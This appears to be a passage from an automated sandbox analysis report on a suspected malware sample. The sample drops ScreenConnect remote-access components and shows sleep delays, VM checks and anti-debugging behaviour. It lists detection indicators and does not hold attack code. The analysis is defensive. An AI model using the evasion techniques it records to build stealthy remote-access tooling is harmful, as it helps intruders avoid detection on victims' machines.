                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593130Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592986Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592558Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592449Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592229Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592119Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6300Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe TID: 2376Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599612s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599478s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599370s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599204s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599030s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -598079s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597829s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597225s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596782s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596535s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596407s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596282s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596157s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595788s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595476s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593721s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593130s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592986s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592558s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592449s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592229s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592119s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592015s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2788Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 4980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 2052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 5976Thread sleep count: 188 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 3008Thread sleep count: 108 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 5508Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B64A4B FindFirstFileExA,0_2_00B64A4B
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: svchost.exe, 00000008.00000003.1505465041.00000189C6432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTAAAAVMWare
                  Source: svchost.exe, 00000007.00000002.2689284980.000001E0E722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2494631390.000001D45927F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2490569450.000001D457230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2690912629.000001E0EC85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1897708665.0000000000B5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B6191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B6191F
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00B61000
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B63677 mov eax, dword ptr fs:[00000030h]0_2_00B63677
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B66893 GetProcessHeap,0_2_00B66893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B61493
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B64573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B64573
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B61AAC SetUnhandledExceptionFilter,0_2_00B61AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844Jump to behavior
